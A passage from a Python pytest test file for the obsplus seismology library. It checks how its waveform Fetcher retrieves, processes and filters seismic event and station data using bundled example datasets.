stream_dict_zero_starttime(self, bing_fetcher):\n \"\"\"yield waveforms into a dict using 0 for starttimes\"\"\"\n return dict(bing_fetcher.yield_event_waveforms(0, self.time_after))\n\n @pytest.fixture(scope=\"class\")\n def fetcher_no_inv(self, bingham_dataset):\n \"\"\"init wavefetcher with inv_df zeroed\"\"\"\n kwargs = dict(\n waveforms=bingham_dataset.waveform_client,\n events=bingham_dataset.event_client,\n )\n return Fetcher(**kwargs)\n\n @pytest.fixture(scope=\"class\")\n def fetcher_missing_events(self, bingham_dataset):\n \"\"\"Create a fetcher which has an event for which there is not data.\"\"\"\n ds: obsplus.Fetcher = bingham_dataset.copy()\n almost_last_event = ds.event_client[-2]\n last_event = ds.event_client[-1]\n # change origin time\n last_event.origins[-1].time += 10_000\n for pick in last_event.picks:\n pick.time += 10_000\n ds.event_client.events = [last_event, almost_last_event]\n return ds.get_fetcher()\n\n @pytest.fixture()\n def fetcher_one_event(self, bingham_dataset, tmp_path):\n \"\"\"Make a fetcher with only one event.\"\"\"\n fetcher = bingham_dataset.get_fetcher()\n inv = bingham_dataset.station_client.get_stations()\n # get stream and event\n kwargs = dict(time_before=1, time_after=1)\n for eid, st in fetcher.yield_event_waveforms(**kwargs):\n break\n eve = fetcher.event_client.get_events(eventid=eid)\n # create a new bank and return new fetcher\n wbank_path = tmp_path / \"waveforms\"\n wbank_path.mkdir(exist_ok=True, parents=True)\n wbank = obsplus.WaveBank(wbank_path)\n wbank.put_waveforms(st, update_index=True)\n wbank.read_index() # need to cache index\n return Fetcher(events=eve, stations=inv, waveforms=wbank)\n\n # general test\n\n def test_duration(self, stream_dict):\n \"\"\"ensure the duration of the streams is correct\"\"\"\n for _, st in stream_dict.items():\n assert self.check_duration(st)\n\n def test_stream_processor(self, stream_dict):\n \"\"\"ensure the waveforms processor ran\"\"\"\n assert len(stream_dict)\n for _, st in stream_dict.items():\n assert self.check_stream_processor_ran(st)\n\n # phase tests\n def test_only_p_phases(self, event_dict_p, subbing_fetcher_with_processor):\n \"\"\"make sure only stations that have p picks are returned\"\"\"\n stream = subbing_fetcher_with_processor.waveform_client.get_waveforms()\n df = subbing_fetcher_with_processor.picks_df\n for eve_id, st in event_dict_p.items():\n con1 = df[\"event_id\"] == eve_id\n con2 = df[\"phase_hint\"].str.upper() == \"P\"\n pick_df = df[con1 & con2]\n # iterate each pick, determine if it has data in the bank\n for ind, row in pick_df.iterrows():\n time = to_utc(row[\"time\"])\n kwargs = dict(\n starttime=time - self.time_before,\n endtime=time + self.time_after,\n station=row[\"station\"],\n )\n st1 = stream.get_waveforms(**kwargs)\n st2 = st.get_waveforms(**kwargs)\n assert_streams_almost_equal(st1, st2, allow_off_by_one=True)\n\n def test_s_phases(self, bingham_dataset):\n \"\"\"make sure only stations that have s picks are returned\"\"\"\n fetcher = bingham_dataset.get_fetcher()\n picks = obsplus.picks_to_df(fetcher.event_client.get_events())\n # There should be some s picks\n assert (picks[\"phase_hint\"].str.lower() == \"s\").any()\n func = fetcher.yield_event_waveforms\n out = dict(func(self.time_before, self.time_after, reference=\"S\"))\n for id, st in out.items():\n assert isinstance(st, obspy.Stream)\n\n # zero starttime test\n def test_zero_starttime(self, stream_dict_zero_starttime):\n \"\"\"test that zero starttimes doesnt throw an error\"\"\"\n for eve_id, stream in stream_dict_zero_starttime.items():\n if not len(stream):\n continue\n assert isinstance(stream, obspy.Stream)\n sr = stream[0].stats.sampling_rate\n t1, t2 = stream[0].stats.starttime, stream[0].stats.endtime\n duration = abs(t2.timestamp - t1.timestamp)\n assert abs(duration - self.time_after) < 2 * sr\n\n def test_stream_length(self, bingham_stream_dict):\n \"\"\"All of the events should have waveform data.\"\"\"\n has_data = [bool(x) for x in bingham_stream_dict.values()]\n assert all(has_data)\n\n def test_event_streams(self, bingham_dataset, bingham_stream_dict):\n \"\"\"Ensure the correct streams are given for ids.\"\"\"\n cat = bingham_dataset.event_client.get_events()\n evs = {str(ev.resource_id): ev for ev in cat}\n for eve_id, st in bingham_stream_dict.items():\n assert len(st), f\"no data for event:{eve_id}\"\n ev = evs[eve_id]\n time2 = get_reference_time(ev).timestamp\n tmin = min([tr.stats.starttime.timestamp for tr in st])\n assert abs(tmin - time2) < 12\n\n # fetch with no stations\n def test_yield_event_waveforms_no_inv(self, fetcher_no_inv):\n \"\"\"\n WaveFetchers backed by WaveBanks should be able to pull\n station data from wavebank index df in most cases.\n \"\"\"\n # ensure the inv_df is not None\n inv_df = fetcher_no_inv.station_df\n assert inv_df is not None\n assert not inv_df.empty\n kwargs = dict(time_after=10, time_before=20, reference=\"p\")\n st_dict = dict(fetcher_no_inv.yield_event_waveforms(**kwargs))\n self.check_stream_dict(st_dict)\n\n def test_events_no_data(self, subbing_fetcher_with_processor):\n \"\"\"\n Create a fetcher with events for which it doesn't have data.\n It should yield empty streams.\n \"\"\"\n fetcher = subbing_fetcher_with_processor\n events = obspy.read_events()\n wave_iterator = fetcher.yield_event_waveforms(1, 1, events=events)\n wave_list = list(wave_iterator)\n assert len(wave_list) == len(events)\n for _, st in wave_list:\n assert isinstance(st, obspy.Stream)\n assert len(st) == 0\n\n def test_raises_on_bad_reference_argument(self, bingham_dataset):\n \"\"\"Selecting a bad reference argument should raise.\"\"\"\n fetcher = bingham_dataset.get_fetcher()\n with pytest.raises(ValueError):\n list(fetcher.yield_event_waveforms(1, 2, reference=\"not supported\"))\n\n def test_raises_with_no_time_before_time_after(self, bing_fetcher):\n \"\"\"Not using time_before or time_after should raise ValueError\"\"\"\n with pytest.raises(ValueError):\n list(bing_fetcher.yield_event_waveforms())\n\n def test_doesnt_raise_on_missing_waveform(self, fetcher_missing_events):\n \"\"\"Ensure yield waveform doesnt raise on missing event.\"\"\"\n iterable = fetcher_missing_events.yield_event_waveforms(1, 10)\n ev_wfs = list(iterable)\n for event_id, stream in ev_wfs:\n assert isinstance(stream, obspy.Stream)\n\n def test_raise_on_missing_waveform(self, fetcher_missing_events, monkeypatch):\n \"\"\"Ensure yield waveform raises on missing event when specified.\"\"\"\n\n def _func(*args, **kwargs):\n raise ValueError(\"Something went wrong!\")\n\n fet = fetcher_missing_events\n monkeypatch.setattr(fet.waveform_client, \"get_waveforms_bulk\", _func)\n # this should raise\n with pytest.raises(ValueError):\n list(fet.yield_event_waveforms(1, 10, raise_on_fail=True))\n # this should not, it should just return an empty list\n with suppress_warnings(UserWarning):\n out = list(fet.yield_event_waveforms(1, 10, raise_on_fail=False))\n assert out == []\n\n def test_event_bank_with_one_event(self, fetcher_one_event):\n \"\"\"\n Ensure an event waveform can be retrieved from a bank with only\n one event. See #186.\n \"\"\"\n kwargs = dict(time_before=1, time_after=1)\n out = dict(fetcher_one_event.yield_event_waveforms(**kwargs))\n assert len(out) == 1\n st = list(out.values())[0]\n assert len(st)\n\n def test_gather(self, event_list_origin, event_dict_p):\n \"\"\"Simply gather aggregated fixtures so they are marked as used.\"\"\"\n\n\nclass TestStreamProcessor:\n \"\"\"ensure the waveforms processors get called\"\"\"\n\n # fixtures\n @pytest.fixture(scope=\"session\")\n def fetcher(self, bing_fetcher):\n \"\"\"return the waveform fetcher and overwrite the stream_processor\"\"\"\n new_fetcher = copy.deepcopy(bing_fetcher)\n\n def stream_processor(st: obspy.Stream) -> obspy.Stream:\n \"\"\"select the z component, detrend, and filter a waveforms\"\"\"\n st = st.select(component=\"Z\")\n st.detrend(\"linear\")\n st.filter(\"bandpass\", freqmin=1, freqmax=10)\n return st\n\n new_fetcher.stream_processor = stream_processor\n\n return new_fetcher\n\n @pytest.fixture(scope=\"session\")\n def stream_list(self, fetcher):\n \"\"\"Return a list of streams from yield waveforms.\"\"\"\n t1 = obspy.UTCDateTime(\"2009-04-01T00-00-00\")\n t2 = obspy.UTCDateTime(\"2009-04-01T03-59-59\")\n duration = 7200\n overlap = 60\n kwargs = dict(starttime=t1, endtime=t2, duration=duration, overlap=overlap)\n return list(fetcher.yield_waveforms(**kwargs))\n\n # tests\n def test_streams_only_z_components(self, stream_list):\n \"\"\"\n Ensure the st.select part of the waveforms processor discarded other\n channels.\n \"\"\"\n for st in stream_list:\n for tr in st:\n assert tr.id.endswith(\"Z\")\n\n\nclass TestSwapAttrs:\n \"\"\"ensure events, stations, and picks objects can be temporarily swapped out\"\"\"\n\n tb = 1\n ta = 3\n\n # fixtures\n\n @pytest.fixture(scope=\"class\")\n def new_time(self, bing_first_time):\n \"\"\"Get a new time based on the first event in bingham_test event + 1\"\"\"\n return to_utc(bing_first_time + 1)\n\n @pytest.fixture(scope=\"class\")\n def catalog(self, bingham_dataset, new_time):\n \"\"\"\n Assemble a events to test yield_event_waveforms with an event\n that was not initiated from the start.\n \"\"\"\n # get first event, create new origin to slightly add some time.\n ori = Origin(time=new_time, latitude=47.1, longitude=-100.22)\n event = Event(origins=[ori])\n return obspy.Catalog(events=[event])\n\n @pytest.fixture(scope=\"class\")\n def new_event_stream(self, bing_fetcher, catalog):\n \"\"\"\n Get a single event from the fetcher, overwriting the attached\n events.\n \"\"\"\n func = bing_fetcher.yield_event_waveforms\n result = func(time_before=self.tb, time_after=self.ta, events=catalog)\n return list(result)[0].stream\n\n @pytest.fixture(scope=\"class\")\n def yield_event_streams(self, bingham_dataset):\n \"\"\"yield a subset of the events in the bingham_test dataset\"\"\"\n event_df = bingham_dataset.event_client.get_events().to_df()\n fetcher = bingham_dataset.get_fetcher()\n tb = 1\n ta = 3\n ite = fetcher.yield_event_waveforms(tb, ta, events=event_df)\n return list(ite)\n\n @pytest.fixture(scope=\"class\")\n def new_inventory_df(self, bing_fetcher):\n \"\"\"return a new stations dataframe with only the first row\"\"\"\n return bing_fetcher.station_df.iloc[0:1]\n\n @pytest.fixture(scope=\"class\")\n def new_inventory_stream(self, bing_fetcher, new_inventory_df, new_time):\n \"\"\"swap out the stations to only return a subset of the channels\"\"\"\n t1, t2 = new_time - self.tb, new_time + self.ta\n return bing_fetcher.get_waveforms(\n starttime=t1, endtime=t2, stations=new_inventory_df\n )\n\n # tests for events swaps\n def test_time(self, new_event_stream, new_time):\n \"\"\"ensure the new time was returned\"\"\"\n assert len(new_event_stream)\n t1 = to_utc(new_event_stream[0].stats.starttime.timestamp)\n t2 = to_utc(new_event_stream[0].stats.endtime.timestamp)\n assert t1 < new_time < t2\n\n def test_iter(self, yield_event_streams):\n \"\"\"ensure the yield events worked\"\"\"\n for event_id, stream in yield_event_streams:\n assert isinstance(stream, obspy.Stream)\n\n # tests for stations swaps\n def test_streams(self, new_inventory_stream, new_inventory_df):\n \"\"\"ensure only the channel in the new_inventory df was returned\"\"\"\n assert len(new_inventory_stream) == 1\n assert new_inventory_stream[0].id == new_inventory_df[\"seed_id\"].iloc[0]\n\n\nclass TestCallWaveFetcher:\n \"\"\"\n Test that calling the wavefetcher provides a simplified interface for\n getting waveforms.\n \"\"\"\n\n tb = 1\n ta = 9\n duration = tb + ta\n\n # fixtures\n @pytest.fixture(scope=\"class\")\n def stream(self, bing_fetcher, bing_first_time):\n \"\"\"return a waveforms from calling the fetcher\"\"\"\n time = bing_first_time\n return bing_fetcher(time, time_before=self.tb, time_after=self.ta)\n\n # tests\n def test_callable(self, bing_fetcher):\n \"\"\"ensure the fetcher is callable\"\"\"\n assert callable(bing_fetcher)\n\n def test_is_stream(self, stream):\n \"\"\"ensure the waveforms is an instance of waveforms\"\"\"\n assert isinstance(stream, obspy.Stream)\n\n def test_channels(self, stream, bing_fetcher):\n \"\"\"ensure all channels are present\"\"\"\n stream_channels = {tr.id for tr in stream}\n sta_channels = set(bing_fetcher.station_df.seed_id)\n assert stream_channels == sta_channels\n\n def test_stream_duration(self, stream):\n \"\"\"ensure the waveforms is of proper duration\"\"\"\n stats = stream[0].stats\n duration = stats.endtime - stats.starttime\n sr = stats.sampling_rate\n assert abs(duration - self.duration) < 2 * sr\n\n def test_zero_in_time_before(self, bing_fetcher):\n \"\"\"ensure setting time_before parameter to 0 doesn't raise\"\"\"\n starttime = obspy.UTCDateTime(\"2009-04-01\")\n try:\n bing_fetcher(starttime, time_before=0, time_after=1)\n except AssertionError:\n pytest.fail(\"should not raise\")\n\n def test_zero_in_time_after(self, bing_fetcher):\n \"\"\"ensure setting time_after parameter to 0 doesn't raise\"\"\"\n starttime = obspy.UTCDateTime(\"2009-04-01\")\n try:\n bing_fetcher(starttime, time_before=1, time_after=0)\n except AssertionError:\n pytest.fail(\"should not raise\")\n\n\nclass TestClientNoGetBulkWaveForms:\n \"\"\"Test that clients without get bulk waveforms, ie earthworm, work\"\"\"\n\n duration = 600\n overlap = 10\n\n # fixtures\n @pytest.fixture\n def ta_bank_no_bulk(self, ta_dataset, monkeypatch):\n \"\"\"remove the get_waveforms_bulk from WaveBank class\"\"\"\n monkeypatch.delattr(WaveBank, \"get_waveforms_bulk\")\n # return a bank\n yield WaveBank(ta_dataset.waveform_path)\n\n @pytest.fixture\n def wavefetcher_no_bulk(self, ta_bank_no_bulk, ta_dataset):\n \"\"\"return a wavefetcher from the bank\"\"\"\n inv = ta_dataset.station_client.get_stations()\n return Fetcher(waveforms=ta_bank_no_bulk, stations=inv)\n\n @pytest.fixture\n def yielded_streams(self, wavefetcher_no_bulk, ta_time_range):\n \"\"\"Yield streams from fetcher.\"\"\"\n t1, t2 = ta_time_range\n duration, overlap = self.duration, self.overlap\n fun = wavefetcher_no_bulk.yield_waveforms\n kwargs = dict(starttime=t1, endtime=t2, duration=duration, overlap=overlap)\n ite = fun(**kwargs)\n return list(ite)\n\n # tests\n def test_streams_yielded(self, yielded_streams):\n \"\"\"\n Assert streams were yielded, ensuring get_waveforms rather\n than get_waveform_bulk was used.\n \"\"\"\n for st in yielded_streams:\n assert isinstance(st, obspy.Stream)\n\n\nclass TestFilterInventoryByAvailability:\n \"\"\"Ensure that only times in the stations get used in get_bulk_args call.\"\"\"\n\n t0 = obspy.UTCDateTime(\"2015-12-01\")\n t1 = obspy.UTCDateTime(\"2016-01-01\")\n t2 = obspy.UTCDateTime(\"2016-02-01\")\n\n # fixtures\n @pytest.fixture\n def altered_inv(self):\n \"\"\"return an stations with one enddate changed to a later date\"\"\"\n df = stations_to_df(obspy.read_inventory())\n df.loc[:, \"start_date\"] = self.t0\n df.loc[:, \"end_date\"] = self.t1\n df.loc[0, \"end_date\"] = self.t2\n return df\n\n @pytest.fixture\n def inv_with_none(self):\n \"\"\"return an stations with one enddate changed to None\"\"\"\n df = stations_to_df(obspy.read_inventory())\n df.loc[:, \"start_date\"] = self.t0\n df.loc[:, \"end_date\"] = self.t1\n df.loc[0, \"end_date\"] = None\n return df\n\n @pytest.fixture\n def bulk_arg_later_time(self, altered_inv):\n \"\"\"Return bulk args for latter time test.\"\"\"\n fetcher = Fetcher(None, stations=altered_inv)\n return fetcher._get_bulk_args(starttime=self.t1 + 10, endtime=self.t2)\n\n @pytest.fixture\n def bulk_arg_none_end_date(self, inv_with_none):\n \"\"\"return the bulk args from an inv with None endate\"\"\"\n fetcher = Fetcher(None, stations=inv_with_none)\n return fetcher._get_bulk_args(starttime=self.t0, endtime=self.t1)\n\n @pytest.fixture\n def fetcher(self, altered_inv, bing_fetcher):\n \"\"\"return a fetcher with the modified times\"\"\"\n return Fetcher(bing_fetcher.waveform_client, stations=altered_inv)\n\n # tests\n def test_bulk_arg_is_limited(self, bulk_arg_later_time, altered_inv):\n \"\"\"\n Ensure bulk arg doesn't include times the stations doesnt\n have data.\n \"\"\"\n assert len(bulk_arg_later_time) == 1\n ba = bulk_arg_later_time[0]\n ser = altered_inv.iloc[0]\n assert ba[0] == ser.network\n assert ba[1] == ser.station\n assert ba[3] == ser.channel\n\n def test_none_endtimes_are_used(self, bulk_arg_none_end_date, inv_with_none):\n \"\"\"ensure any channels with enddates of None are not filtered out\"\"\"\n assert len(bulk_arg_none_end_date) == len(inv_with_none)\n\n def test_empty_stream_from_before_start(self, fetcher):\n \"\"\"\n Ensure when data is requested before stations starttime that an\n empty string is returned.\n \"\"\"\n st = fetcher(obspy.UTCDateTime(\"1970-01-01\"), 10, 40)\n assert isinstance(st, obspy.Stream)\n assert not len(st)\n\n\nclass TestFetchersFromDatasets:\n \"\"\"Tests for the fetchers returned from the datasets.\"\"\"\n\n @pytest.fixture(scope=\"class\", params=DataSet._datasets)\n def data_fetcher(self, request):\n \"\"\"Return a datafetcher from all datasets.\"\"\"\n with suppress_warnings(UserWarning):\n return obsplus.load_dataset(request.param).get_fetcher()\n\n def test_type(self, data_fetcher):\n \"\"\"Ensure a fetcher was returned.\"\"\"\n assert isinstance(data_fetcher, Fetcher)\n\n def test_event_df(self, data_fetcher):\n \"\"\"ensure the event df has the event_id column.\"\"\"\n df = data_fetcher.event_df\n assert \"event_id\" in df.columns\n\n\nclass TestFetcherDuplicateChannels:\n \"\"\"\n Ensure the fetcher does the right thing when duplicate channels occur\n in the inventory.\n \"\"\"\n\n def split_inventory(self, inv_df, cat):\n \"\"\"\n Split the inventory and duplicate so first have encompasses half of\n the events and second gets the second half.\n \"\"\"\n edf = obsplus.events_to_df(cat).sort_values(\"time\")\n ser = edf.loc[len(edf) // 2]\n inv1, inv2 = inv_df.copy(), inv_df.copy()\n inv1[\"end_date\"] = ser[\"time\"]\n inv2[\"start_date\"] = ser[\"time\"]\n new = pd.concat([inv1, inv2], ignore_index=True, axis=0).reset_index()\n return df_to_inventory(new)\n\n @pytest.fixture\n def fetcher_duplicate_channels(self, bingham_dataset):\n \"\"\"Create a fetcher with duplicate channels\"\"\"\n inv_df = obsplus.stations_to_df(bingham_dataset.station_client)\n cat = bingham_dataset.event_client\n wbank = bingham_dataset.waveform_client\n inv = self.split_inventory(inv_df, cat)\n return Fetcher(waveforms=wbank, events=cat, stations=inv)\n\n def test_get_waveforms(self, fetcher_duplicate_channels):\n \"\"\"Ensure the Fetcher can yield event waveforms.\"\"\"\n fet = fetcher_duplicate_channels\n # before the fix this would raise; just check the output\n st_dict = dict(fet.yield_event_waveforms(time_after=5, time_before=1))\n for event_id, st in st_dict.items():\n assert isinstance(st, obspy.Stream)\n assert len(st)\n","repo_name":"niosh-mining/obsplus","sub_path":"tests/test_structures/test_fetcher.py","file_name":"test_fetcher.py","file_ext":"py","file_size_in_byte":34459,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"44"}